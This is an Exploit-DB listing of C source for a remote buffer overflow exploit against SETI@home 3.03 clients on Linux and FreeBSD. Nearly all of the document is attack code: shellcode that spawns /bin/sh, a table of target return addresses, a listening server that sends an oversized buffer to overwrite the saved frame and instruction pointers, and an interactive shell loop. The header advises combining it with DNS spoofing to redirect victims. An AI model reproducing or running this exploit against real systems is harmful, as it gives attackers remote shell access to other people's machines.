SETI@home Clients - Remote Buffer Overflow

EDB-ID:

8


Author:

zillion

Type:

remote


Platform:

Linux

Date:

2003-04-08


/*
   Seti@Home exploit by zillion[at]safemode.org (2003/01/07)

   Credits for the vulnerability go to: SkyLined <SkyLined@edup.tudelft.nl>
   http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Seti@home

   Use this exploit in combination with a DNS spoofing utility such as the one
   provided in the Dsniff package. http://naughty.monkey.org/~dugsong/dsniff/

*/

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <stdio.h>

#define NOP 0x41
#define EXEC "TERM=xterm; export TERM=xterm;exec /bin/sh -i"
#define EXEC2 "id;uname -a;"

char linux_shellcode[] =

   /* dup */
   "\x31\xc9\x31\xc0\x31\xdb\xb3\x04\xb0\x3f\xcd\x80\xfe\xc1\xb0"
   "\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"


   /* execve /bin/sh */
   "\x31\xdb\x31\xc9\xf7\xe3\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
   "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";


char freebsd_shellcode[] =

  "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb1\x03\xbb\xff\xff\xff\xff"
  "\xb2\x04\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3"

  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
  "\xb0\x3b\x50\xcd\x80";

char static_crap[] =

   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

struct target
{
  int   num;
  char *description;
  char *versions;
  char *type;
  char *shellcode;
  long  retaddress;
  int   bufsize;
  int   offset;
  int   junk;
};

struct target targets[] =
{
  {0,  "Linux  2.2.* ", "3.03.i386      linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
   0xbffff420, 520, 500, 0},
  {1,  "Linux  2.4.* ", "3.03 i386/i686 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
   0xbffff390, 520, 500, 1},
  {2,  "Linux  2.*   ", "3.03.i386/i686 linux-gnulibc1-static", "Packet retr mode", linux_shellcode,
  0xbffff448, 520, 500, 1},
  {3,  "All above    ", "3.03.i386      linux*               ", "Packet retr mode", linux_shellcode,
   0xbffff448, 520, 300, 1},
  {4,  "FreeBSD      ", "3.03.i386      FreeBSD-2.2.8        ", "Packet retr mode", freebsd_shellcode,
 0x0004956c, 520, 1, 2},
  {5, NULL, NULL, NULL, NULL, 0, 0, 0}
};

int open_socket(int port)
{

  int sock,fd;
  struct sockaddr_in cliAddr, servAddr;

  sock = socket(AF_INET, SOCK_STREAM, 0);
   if(sock<0) {
    printf("Error: Cannot open socket \n");
    exit(1);
  }

  /* bind server port */
  servAddr.sin_family = AF_INET;
  servAddr.sin_addr.s_addr = htonl(INADDR_ANY);
  servAddr.sin_port = htons(port);

  if(bind(sock, (struct sockaddr *) &servAddr, sizeof(servAddr))<0) {
    printf("Error: Cannot bind to port %d \n",port);
    exit(1);
  }

  listen(sock,5);
  fd=accept(sock,0,0);

  return fd;
}

void usage(char *progname) {

  int i;

  printf("\n---------------------------------------------------");
  printf("\n  *- Seti@Home remote exploit by zillion (s-m0de) -*");
  printf("\n---------------------------------------------------");
  printf("\n\nDefault      : %s  -h <target host>",progname);
  printf("\nTarget       : %s  -t <number>",progname);
  printf("\nOffset       : %s  -o <offset>",progname);
  printf("\nPort         : %s  -p <port>\n",progname);
  printf("\nDebug        : %s  -d \n",progname);

  printf("\nAvailable types:\n");
  printf("---------------------------------------------------\n");
  for(i = 0; targets[i].description; i++) {
    fprintf(stdout, "%d\t%s\t%s\t%s\n", targets[i].num, targets[i].description,targets[i].
versions,targets[i].type);
  }
  printf("\n\n");
  exit(0);
}

int sh(int sockfd) {
  char snd[1024], rcv[1024];
  fd_set rset;
  int maxfd, n,test;

  strcpy(snd, EXEC "\n");
  write(sockfd, snd, strlen(snd));

  read(sockfd,rcv,7);
  fflush(stdout);

  strcpy(snd, EXEC2 "\n");
  write(sockfd, snd, strlen(snd));

  /* Main command loop */
  for (;;) {
    FD_SET(fileno(stdin), &rset);
    FD_SET(sockfd, &rset);

    maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
    select(maxfd, &rset, NULL, NULL, NULL);

    if (FD_ISSET(fileno(stdin), &rset)) {
      bzero(snd, sizeof(snd));
      fgets(snd, sizeof(snd)-2, stdin);
      write(sockfd, snd, strlen(snd));
    }

    if (FD_ISSET(sockfd, &rset)) {
      bzero(rcv, sizeof(rcv));

      if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
	/* exit */
	return 0;
      }

      if (n < 0) {
	perror("read");
	return 1;
      }

      fputs(rcv, stdout);
      fflush(stdout);
    }
  } /* for(;;) */
}


int main(int argc, char **argv){

  char *buffer,*tmp;
  long retaddress;
  char rcv[200];
  int fd,i,arg,debug=0,type=0,port=80,offset=250;

  if(argc < 2) { usage(argv[0]); }

  while ((arg = getopt (argc, argv, "dh:o:l:p:t:")) != -1){
    switch (arg){
    case 'd':
	debug = 1;
	break;
    case 'o':
      offset = atoi(optarg);
      break;
    case 'p':
      port = atoi(optarg);
      break;
    case 't':
      type = atoi(optarg);
      break;
    default :
      usage(argv[0]);
    }
  }

  if((targets[type].retaddress) != 0) {
    buffer = (char *)malloc((targets[type].bufsize));

    /* some junk may be required to counter buffer manipulation */

    if(targets[type].junk == 1) {

    tmp = (char *)malloc(strlen(static_crap) + strlen(targets[type].shellcode));

    strcpy(tmp,targets[type].shellcode);
    strcat(tmp,static_crap);

    targets[type].shellcode = tmp;

    }

    memset(buffer,NOP,targets[type].bufsize);
    memcpy(buffer + (targets[type].bufsize) - (strlen(targets[type].shellcode) + 8) ,targets[type].
shellcode,strlen(targets[type].shellcode));

    /* Overwrite EBP and EIP */
    *(long *)&buffer[(targets[type].bufsize) - 8]  = (targets[type].retaddress - targets[type].offset);


    // If freebsd we need to place a value without 00 in ebp

    if(type == 4) {
       *(long *)&buffer[(targets[type].bufsize) - 8]  = 0xbfbff654;
    }

    *(long *)&buffer[(targets[type].bufsize) - 4]  = (targets[type].retaddress - targets[type].offset);

    /* Uncomment to overwrite eip and ebp with 41414141 */
    if(debug == 1) {
    *(long *)&buffer[(targets[type].bufsize) - 8]  = 0x41414141;
    *(long *)&buffer[(targets[type].bufsize) - 4]  = 0x41414141;
    }
  }

  fd = open_socket(port);

  write(fd,buffer,strlen(buffer));
  write(fd,"\n",1);
  write(fd,"\n",1);

  sleep(1);
  sh(fd);

  close(fd);
  return 0;

}


// milw0rm.com [2003-04-08]